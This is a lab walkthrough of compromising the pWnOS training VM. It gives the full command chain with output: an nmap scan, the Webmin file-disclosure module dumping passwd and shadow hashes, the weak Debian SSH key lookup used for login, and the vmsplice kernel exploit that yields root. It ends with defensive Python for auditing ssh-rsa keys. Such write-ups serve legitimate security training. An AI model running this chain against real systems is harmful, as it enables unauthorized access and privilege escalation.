pWnOS penetration test

Kali IP: 192.168.2.133

Target IP: 192.168.2.139

1. Information gathering

  • nmap -sV -A 192.168.2.139
    • Host is up (0.0062s latency).
      Not shown: 995 closed tcp ports (reset)
      PORT STATE SERVICE VERSION
      22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
      80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
      139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
      445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
      10000/tcp open http MiniServ 0.01 (Webmin httpd)

2. Exploitation

  • Webmin arbitrary file read
    • Use the msf module admin/webmin/file_disclosure
    • Four users are found
      • vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
        obama:x:1001:1001::/home/obama:/bin/bash
        osama:x:1002:1002::/home/osama:/bin/bash
        yomama:x:1003:1003::/home/yomama:/bin/bash
      • vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
        obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
        osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
        yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
      • Cracking the password hashes would be too slow, so check whether any SSH public keys exist. Looking at the first user, a public key is found
        • ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw== vmware@ubuntuvm
    • Use a tool to find the matching private key
      • # Download the tool and extract it
        wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
        tar xjf 5622.tar.bz2

        # Find the public key file that matches the recovered public key
        cd rsa/2048
        grep -lr "AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw=="

        # Public key file found
        d8629ce6dc8f2492e1454c13f46adb26-4566.pub

        # Find the private key file
        The private key is the file with the same name minus the .pub suffix
    • Log in with the private key (no password needed) and get a shell
      • ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.2.139 -oHostKeyAlgorithms=ssh-rsa -oPubkeyAcceptedKeyTypes=ssh-rsa
        vmware@ubuntuvm:~$
  • Privilege escalation through the kernel
    • Check the kernel version: uname -a
      • Linux ubuntuvm 2.6.22-14-server
    • Look for kernel exploits: searchsploit "Linux Kernel 2.6.2" | grep "Local Privilege"
      • Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)     linux/local/5092.c
        # Fetch a local copy
        searchsploit -m linux/local/5092.c .
    • Local privilege escalation
      • The author's comments contain no special instructions, so the file is served to the target with Python, then compiled and run
        • gcc 5092.c -o poc
          ./poc

          # root straight away
          -----------------------------------
          Linux vmsplice Local Root Exploit
          By qaaz
          -----------------------------------
          [+] mmap: 0x0 .. 0x1000
          [+] page: 0x0
          [+] page: 0x20
          [+] mmap: 0x4000 .. 0x5000
          [+] page: 0x4000
          [+] page: 0x4020
          [+] mmap: 0x1000 .. 0x2000
          [+] page: 0x1000
          [+] mmap: 0xb7daf000 .. 0xb7de1000
          [+] root
          root@ubuntuvm:~#
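The weak-key step above works because the key in the user's authorized_keys comes from a small, predictable key set. As an added example that is not part of the original walkthrough, the following defender-side audit decodes an ssh-rsa authorized_keys line (the sample is the key line quoted above), reports its exponent, modulus size and SHA256 fingerprint, and flags it when the fingerprint is on a caller-supplied list of known-weak or revoked keys; that list, and the finding texts, are assumptions of this example.

```python
import base64
import hashlib
import struct

# Sample input: the authorized_keys line recovered from the target above.
SAMPLE_KEY_LINE = "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw== vmware@ubuntuvm"

def _read_string(blob, offset):
    """Read one RFC 4251 'string' (4-byte big-endian length, then payload)."""
    (length,) = struct.unpack(">I", blob[offset:offset + 4])
    start = offset + 4
    return blob[start:start + length], start + length

def parse_ssh_rsa_key(line):
    """Decode an OpenSSH ssh-rsa public key line (RFC 4253 6.6: string
    "ssh-rsa", mpint e, mpint n) into type, exponent, bits, comment, fingerprint."""
    parts = line.split()
    if len(parts) < 2:
        raise ValueError("expected '<type> <base64 blob> [comment]'")
    key_type, b64, comment = parts[0], parts[1], " ".join(parts[2:])
    if key_type != "ssh-rsa":
        raise ValueError("not an ssh-rsa key")
    blob = base64.b64decode(b64, validate=True)
    wire_type, off = _read_string(blob, 0)
    e_bytes, off = _read_string(blob, off)
    n_bytes, off = _read_string(blob, off)
    if wire_type != b"ssh-rsa" or off != len(blob):
        raise ValueError("malformed or truncated key blob")
    # OpenSSH's SHA256 fingerprint is the unpadded base64 of sha256(blob).
    digest = base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    return {
        "type": key_type,
        "exponent": int.from_bytes(e_bytes, "big"),
        "bits": int.from_bytes(n_bytes, "big").bit_length(),
        "comment": comment,
        "fingerprint": "SHA256:" + digest,
    }

def audit_key(line, weak_fingerprints=frozenset()):
    """Return (info, findings). weak_fingerprints is an assumed, caller-supplied
    set of SHA256 fingerprints of keys known to be weak or revoked."""
    info = parse_ssh_rsa_key(line)
    findings = []
    if info["fingerprint"] in weak_fingerprints:
        findings.append("fingerprint is on the known-weak/revoked list")
    if info["bits"] < 2048:
        findings.append(f"modulus is only {info['bits']} bits")
    if info["exponent"] != 65537:
        findings.append(f"exponent {info['exponent']} predates modern ssh-keygen defaults")
    return info, findings
```

On the sample key this reports a 2048-bit modulus with public exponent 35, the value older ssh-keygen releases used, which is a useful first hint that a key is old enough to deserve rotation even before its fingerprint is checked against a blocklist.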
